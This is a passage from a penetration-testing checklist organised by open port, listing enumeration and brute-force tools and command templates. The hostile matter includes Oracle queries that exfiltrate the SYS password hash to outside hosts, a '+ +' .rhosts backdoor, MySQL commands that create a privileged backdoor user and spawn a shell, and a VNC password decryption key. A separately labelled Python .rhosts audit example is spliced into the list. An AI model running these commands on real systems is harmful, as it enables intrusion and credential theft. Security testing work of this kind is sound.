  387. § lmhosts
  388. • SNMP port 161 open
  389. ○ Default Community Strings
  390. § public
  391. § private
  392. § cisco
  393. □ cable-docsis
  394. □ ILMI
  395. ○ MIB enumeration
  396. § Windows NT
  397. □ .1.3.6.1.2.1.1.5 Hostnames
  398. □ .1.3.6.1.4.1.77.1.4.2 Domain Name
  399. □ .1.3.6.1.4.1.77.1.2.25 Usernames
  400. □ .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
  401. □ .1.3.6.1.4.1.77.1.2.27 Share Information
  402. § Solarwinds MIB walk
  403. § Getif
  404. § snmpwalk
  405. □ snmpwalk -v <Version> -c <Community string> <IP>
  406. § Snscan
  407. § Applications
  408. □ ZyXel
  409. ® snmpget -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2.6.0
  410. ® snmpwalk -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2
  411. ○ SNMP Bruteforce
  412. § onesixtyone
  413. □ onesixtyone -c SNMP.wordlist <IP>
  414. § cat
  415. □ ./cat -h <IP> -w SNMP.wordlist
  416. § Solarwinds SNMP Brute Force
  417. § ADMsnmp
  418. ○ Examine SNMP Configuration files
  419. § snmp.conf
  420. § snmpd.conf
  421. § snmp-config.xml
  422. • LDAP Port 389 Open
  423. ○ ldap enumeration
  424. § ldapminer
  425. □ ldapminer -h ip_address -p port (not required if default) -d
  426. § luma
  427. □ Gui based tool
  428. § ldp
  429. □ Gui based tool
  430. § openldap
  431. □ ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
  432. □ ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
  433. □ ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
  434. □ ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
  435. □ ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
  436. ○ ldap brute force
  437. § bf_ldap
  438. □ bf_ldap -s server -d domain_name -u|-U (username | users list file name) -L|-l (passwords list | length of passwords to generate) [-p port (default 389)] [-v verbose mode] [-P LDAP user path (default ,CN=Users,)]
  439. § K0ldS
  440. § LDAP_Brute.pl
  441. ○ Examine Configuration Files
  442. § General
  443. □ containers.ldif
  444. □ ldap.cfg
  445. □ ldap.conf
  446. □ ldap.xml
  447. □ ldap-config.xml
  448. □ ldap-realm.xml
  449. □ slapd.conf
  450. § IBM SecureWay V3 server
  451. □ V3.sas.oc
  452. § Microsoft Active Directory server
  453. □ msadClassesAttrs.ldif
  454. § Netscape Directory Server 4
  455. □ nsslapd.sas_at.conf
  456. □ nsslapd.sas_oc.conf
  457. § OpenLDAP directory server
  458. □ slapd.sas_at.conf
  459. □ slapd.sas_oc.conf
  460. § Sun ONE Directory Server 5.1
  461. □ 75sas.ldif
  462. • VPN: IKE/IPsec port 500, PPTP port 1723 (L2TP uses 1701) open
  463. ○ Enumeration
  464. § ike-scan
  465. § ike-probe
  466. ○ Brute-Force
  467. § ike-crack
  468. ○ Reference Material
  469. § PSK cracking paper
  470. § SecurityFocus Infocus
  471. § Scanning a VPN Implementation
  472. • Modbus port 502 open
  473. ○ modscan
  474. • rlogin port 513 open
  475. ○ Rlogin Enumeration
  476. § Find the files
  477. □ find / -name .rhosts
  478. □ locate .rhosts
  479. § Examine Files
  480. □ cat .rhosts
  481. § Manual Login
  482. □ rlogin hostname -l username
  483. □ rlogin <IP>
  484. § Subvert the files
  485. □ echo "+ +" > .rhosts (host wildcard and user wildcard, separated by a space)
  486. ○ Rlogin Brute force
  487. § Hydra
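Added example (not from the original checklist): an evaluator for .rhosts trust under the classic ruserok rules, used here to show why 'echo "+ +" > .rhosts' works and how to audit for it when examining the files found above. The two files are constructed; netgroup (+@name) entries are not handled.

```python
"""Trust evaluation for .rhosts / hosts.equiv entries and an audit for the
wildcard lines an attacker plants with: echo "+ +" > .rhosts

Added example, not from the original checklist. The semantics follow the
classic ruserok() rules (first matching line decides; '+' is a wildcard;
'-name' is an explicit deny; a missing user column means 'same login name').
Netgroup (+@name) entries are out of scope here. File contents are constructed.
"""

CLEAN_RHOSTS = """\
# constructed ~/.rhosts for user 'alice'
buildhost.example.com            # alice from buildhost, no password
buildhost.example.com deploy     # user 'deploy' on buildhost may also log in
-evil.example.com                # explicit deny, wins over anything below
"""

BACKDOORED_RHOSTS = CLEAN_RHOSTS + "+ +\n"   # what 'echo "+ +" >> .rhosts' leaves behind


def parse_rhosts(text):
    """Return [(host_field, user_field_or_None), ...] ignoring comments/blanks."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        entries.append((parts[0], parts[1] if len(parts) > 1 else None))
    return entries


def _match(field, value):
    """'+' matches anything, '-name' denies name, otherwise exact match.
    Returns 'allow', 'deny' or 'skip' (this field does not apply)."""
    if field == "+":
        return "allow"
    if field.startswith("-"):
        return "deny" if field[1:] == value else "skip"
    return "allow" if field == value else "skip"


def is_trusted(entries, remote_host, remote_user, local_user):
    """True if remote_user@remote_host may log in as local_user without a
    password; the first entry that decides, allow or deny, is final."""
    for host, user in entries:
        h = _match(host, remote_host)
        if h == "deny":
            return False
        if h == "skip":
            continue
        if user is None:                      # host-only line: same login name
            if remote_user == local_user:
                return True
            continue
        u = _match(user, remote_user)
        if u == "deny":
            return False
        if u == "allow":
            return True
    return False


def audit(entries):
    """Flag the wildcard forms; '+ +' is the textbook rlogin backdoor."""
    findings = []
    for host, user in entries:
        shown = host + (" " + user if user else "")
        if host == "+" and user == "+":
            findings.append(f"{shown!r}: any user from any host, no password")
        elif host == "+":
            findings.append(f"{shown!r}: every host is trusted")
        elif user == "+":
            findings.append(f"{shown!r}: every user on {host} is trusted")
    return findings


if __name__ == "__main__":
    for label, text in (("clean", CLEAN_RHOSTS), ("backdoored", BACKDOORED_RHOSTS)):
        entries = parse_rhosts(text)
        print(label, "root from anywhere:", is_trusted(entries, "other.example.com", "root", "root"))
        for f in audit(entries):
            print("  ", f)
```

Because the first deciding line wins, an explicit -host line above the planted "+ +" still blocks that host; the audit therefore reports the wildcard regardless of position rather than trying to reason about what it reaches.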
  488. • rsh port 514 open
  489. ○ Rsh Enumeration
  490. § rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
  491. ○ Rsh Brute Force
  492. § rsh-grind
  493. § Hydra
  494. § medusa
  495. • SQL Server Port 1433 1434 open
  496. ○ SQL Enumeration
  497. § piggy
  498. § SQLPing
  499. □ sqlping ip_address/hostname
  500. § SQLPing2
  501. § SQLPing3
  502. § SQLpoke
  503. § SQL Recon
  504. § SQLver
  505. ○ SQL Brute Force
  506. § SQLPAT
  507. □ sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
  508. □ sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
  509. § SQL Dict
  510. § SQLAT
  511. § Hydra
  512. § SQLlhf
  513. § ForceSQL
  514. • Citrix port 1494 open
  515. ○ Citrix Enumeration
  516. § Default Domain
  517. § Published Applications
  518. □ ./citrix-pa-scan {IP_address/file | - | random} [timeout]
  519. □ citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
  520. ○ Citrix Brute Force
  521. § bforce.js
  522. § connect.js
  523. § Citrix Brute-forcer
  524. § Reference Material
  525. □ Hacking Citrix - the legitimate backdoor
  526. □ Hacking Citrix - the forceful way
  527. • Oracle Port 1521 Open
  528. ○ Oracle Enumeration
  529. § oracsec
  530. § Repscan
  531. § Sidguess
  532. § Scuba
  533. § DNS/HTTP Enumeration
  534. □ SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;
  535. □ SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) from dual;
  536. § WinSID
  537. § Oracle default password list
  538. § TNSVer
  539. □ tnsver host [port]
  540. § TCP Scan
  541. § Oracle TNSLSNR
  542. □ Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
  543. § TNSCmd
  544. □ perl tnscmd.pl -h ip_address
  545. □ perl tnscmd.pl version -h ip_address
  546. □ perl tnscmd.pl status -h ip_address
  547. □ perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
  548. § LSNrCheck
  549. § Oracle Security Check (needs credentials)
  550. § OAT
  551. □ sh opwg.sh -s ip_address
  552. □ opwg.bat -s ip_address
  553. □ sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
  554. § OScanner
  555. □ sh oscanner.sh -s ip_address
  556. □ oscanner.exe -s ip_address
  557. □ sh reportviewer.sh oscanner_saved_file.xml
  558. □ reportviewer.exe oscanner_saved_file.xml
  559. § NGS Squirrel for Oracle
  560. § Service Register
  561. □ Service-register.exe ip_address
  562. § PLSQL Scanner 2008
  563. ○ Oracle Brute Force
  564. § OAK
  565. □ ora-getsid hostname port sid_dictionary_list
  566. □ ora-auth-alter-session host port sid username password sql
  567. □ ora-brutesid host port start
  568. □ ora-pwdbrute host port sid username password-file
  569. □ ora-userenum host port sid userlistfile
  570. □ ora-ver -e (-f -l -a) host port
  571. § breakable (Targets Application Server Port)
  572. □ breakable.exe host url [port] [v] (host: IP address of the Oracle Portal Server; url: PATH_INFO i.e. /pls/orasso; port: TCP port the Oracle Portal Server serves pages from; v: verbose)
  573. § SQLInjector (Targets Application Server Port)
  574. □ sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
  575. □ sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
  576. § Check Password
  577. § orabf
  578. □ orabf [hash]:[username] [options]
  579. § thc-orakel
  580. □ Cracker
  581. □ Client
  582. □ Crypto
  583. § DBVisualisor
  584. □ Sql scripts from pentest.co.uk
  585. □ Manual sql input of previously reported vulnerabilties
  586. ○ Oracle Reference Material
  587. § Understanding SQL Injection
  588. § SQL Injection walkthrough
  589. § SQL Injection by example
  590. § Advanced SQL Injection in Oracle databases
  591. § Blind SQL Injection
  592. § SQL Cheatsheets
  593. □ http://ha.ckers.org/sqlinjection
  594. □ http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
  595. □ http://www.0x000000.com/?i=14
  596. □ http://pentestmonkey.net/
  597. • NFS Port 2049 open
  598. ○ NFS Enumeration
  599. § showmount -e hostname/ip_address
  600. § mount -t nfs ip_address:/directory_found_exported /local_mount_point
  601. ○ NFS Brute Force
  602. § Interact with NFS share and try to add/delete
  603. § Exploit and Confuse Unix
  604. ○ Examine Configuration Files
  605. § /etc/exports
  606. § /etc/lib/nfs/xtab
  607. • Compaq/HP Insight Manager Port 2301, 2381 open
  608. ○ HP Enumeration
  609. § Authentication Method
  610. □ Host OS Authentication
  611. □ Default Authentication
  612. ® Default Passwords
  613. § Wikto
  614. § Nstealth
  615. ○ HP Bruteforce
  616. § Hydra
  617. § Acunetix
  618. ○ Examine Configuration Files
  619. § path.properties
  620. § mx.log
  621. § CLIClientConfig.cfg
  622. § database.props
  623. § pg_hba.conf
  624. § jboss-service.xml
  625. § .namazurc
  626. • MySQL port 3306 open
  627. ○ Enumeration
  628. § nmap -A -n -p3306 <IP Address>
  629. § nmap -A -n -PN --script=all -p3306 <IP Address>
  630. § telnet IP_Address 3306
  631. § use test; select * from test;
  632. § To check for other DB's -- show databases
  633. ○ Administration
  634. § MySQL Network Scanner
  635. § MySQL GUI Tools
  636. § mysqlshow
  637. § mysqlbinlog
  638. ○ Manual Checks
  639. § Default usernames and passwords
  640. □ username: root password:
  641. □ testing
  642. ® mysql -h <Hostname> -u root
  644. ® mysql -h <Hostname> -u root@localhost
  645. ® mysql -h <Hostname>
  646. ® mysql -h <Hostname> -u ""@localhost
  647. § Configuration Files
  648. □ Operating System
  649. ® windows
  650. ◊ config.ini
  651. ◊ my.ini
  652. } windows\my.ini
  653. } winnt\my.ini
  654. ◊ <InstDir>/mysql/data/
  655. ® unix
  656. ◊ my.cnf
  657. } /etc/my.cnf
  658. } /etc/mysql/my.cnf
  659. } /var/lib/mysql/my.cnf
  660. } ~/.my.cnf
  662. □ Command History
  663. ® ~/.mysql.history
  664. □ Log Files
  665. ® connections.log
  666. ® update.log
  667. ® common.log
  668. □ To run many sql commands at once -- mysql -u username -p < manycommands.sql
  669. □ MySQL data directory (Location specified in my.cnf)
  670. ® Parent dir = data directory
  671. ® mysql
  672. ® test
  673. ® information_schema (Key information in MySQL)
  674. ◊ Complete table list -- select table_schema,table_name from tables;
  675. ◊ Exact privileges -- select grantee, table_schema, privilege_type FROM schema_privileges;
  676. ◊ File privileges -- select user,file_priv from mysql.user where user='root';
  677. ◊ Version -- select version();
  678. ◊ Load a specific file -- SELECT LOAD_FILE('FILENAME');
  679. □ SSL Check
  680. ® mysql> show variables like 'have_openssl';
  681. ◊ If no rows are returned at all, the build itself doesn't support SSL connections and would need to be recompiled. If the value is DISABLED, the server just wasn't started with SSL and that is easily fixed.
  682. § Privilege Escalation
  683. □ Current Level of access
  684. ® mysql>select user();
  685. ® mysql> select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from mysql.user where user='<user part of the select user() output>';
  686. □ Access passwords
  687. ® mysql> use mysql
  688. ® mysql> select user,password from user;
  689. □ Create a new user and grant him privileges
  690. ® mysql>create user test identified by 'test';
  691. ® mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to 'test'@'%' identified by 'test' WITH GRANT OPTION;
  692. □ Break into a shell
  693. ® mysql> \! cat /etc/passwd
  694. ® mysql> \! bash
  695. ○ SQL injection
  696. § mysql-miner.pl
  697. □ mysql-miner.pl http://target/ expected_string database
  698. § http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
  699. § http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
  700. ○ References.
  701. § Design Weaknesses
  702. □ MySQL running as root
  703. □ Exposed publicly on Internet
  704. § http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
  705. § http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
  706. • RDesktop port 3389 open
  707. ○ Rdesktop Enumeration
  708. § Remote Desktop Connection
  709. ○ Rdestop Bruteforce
  710. § TSGrinder
  711. □ tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
  712. § Tscrack
  713. • Sybase Port 5000+ open
  714. ○ Sybase Enumeration
  715. § sybase-version ip_address from NGS
  716. ○ Sybase Vulnerability Assessment
  717. § Use DBVisualiser
  718. □ Sybase Security checksheet
  719. ® Copy output into excel spreadsheet
  720. ® Evaluate mis-configured parameters
  721. □ Manual sql input of previously reported vulnerabilties
  722. ® Advanced SQL Injection in SQL Server
  723. ® More Advanced SQL Injection
  724. § NGS Squirrel for Sybase
  725. • SIP Port 5060 open
  726. ○ SIP Enumeration
  727. § netcat
  728. □ nc IP_Address Port
  729. § sipflanker
  730. □ python sipflanker.py 192.168.1-254
  731. § Sipscan
  732. § smap
  733. □ smap IP_Address/Subnet_Mask
  734. □ smap -o IP_Address/Subnet_Mask
  735. □ smap -l IP_Address
  736. ○ SIP Packet Crafting etc.
  737. § sipsak
  738. □ Tracing paths: - sipsak -T -s sip:username@domain
  739. □ Options request:- sipsak -vv -s sip:username@domain
  740. □ Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
  741. § siprogue
  742. ○ SIP Vulnerability Scanning/ Brute Force
  743. § tftp bruteforcer
  744. □ Default dictionary file
  745. □ ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
  746. § VoIPaudit
  747. § SiVuS
  748. ○ Examine Configuration Files
  749. § SIPDefault.cnf
  750. § asterisk.conf
  751. § sip.conf
  752. § phone.conf
  753. § sip_notify.conf
  754. § <Ethernet address>.cfg
  755. § 000000000000.cfg
  756. § phone1.cfg
  757. § sip.cfg etc. etc.
  758. • VNC port 5900^ open
  759. ○ VNC Enumeration
  760. § Scans
  761. □ 5900+ (one port per display, 5900 = :0) for direct access; 5800+ for the HTTP/Java viewer.
  762. ○ VNC Brute Force
  763. § Password Attacks
  764. □ Remote
  765. ® Password Guess
  766. ◊ vncrack
  767. ® Password Crack
  768. ◊ vncrack
  769. ◊ Packet Capture
  770. } Phoss http://www.phenoelit.de/phoss
  771. □ Local
  772. ® Registry Locations
  773. ◊ \HKEY_CURRENT_USER\Software\ORL\WinVNC3
  774. ◊ \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3
  775. ® Decryption Key
  776. ◊ 0x2382107635788807 (the fixed DES key 23 82 10 76 35 78 88 07 that obfuscates the stored password)
  777. ○ Examine Configuration Files
  778. § .vnc
  779. § /etc/vnc/config
  780. § $HOME/.vnc/config
  781. § /etc/sysconfig/vncservers
  782. § /etc/vnc.conf
  783. • X11 port 6000^ open
  784. ○ X11 Enumeration
  785. § List open windows
  786. § Authentication Method
  787. □ Xauth
  788. □ Xhost
  789. ○ X11 Exploitation
  790. § xwd
  791. □ xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
  792. § Keystrokes
  793. □ Received
  794. □ Transmitted
  795. § Screenshots
  796. § xhost +
  797. ○ Examine Configuration Files
  798. § /etc/Xn.hosts
  799. § /usr/lib/X11/xdm
  800. □ Search through all files for the command "xhost +" or "/usr/bin/X11/xhost +"
  801. § /usr/lib/X11/xdm/xsession
  802. § /usr/lib/X11/xdm/xsession-remote
  803. § /usr/lib/X11/xdm/xsession.0
  804. § /usr/lib/X11/xdm/xdm-config
  805. □ DisplayManager*authorize:on
  806. • Tor Port 9001, 9030 open
  807. ○ Tor Node Checker
  808. § Ip Pages
  809. § Kewlio.net
  810. ○ nmap NSE script
  811. • Jet Direct 9100 open
  812. ○ hijetter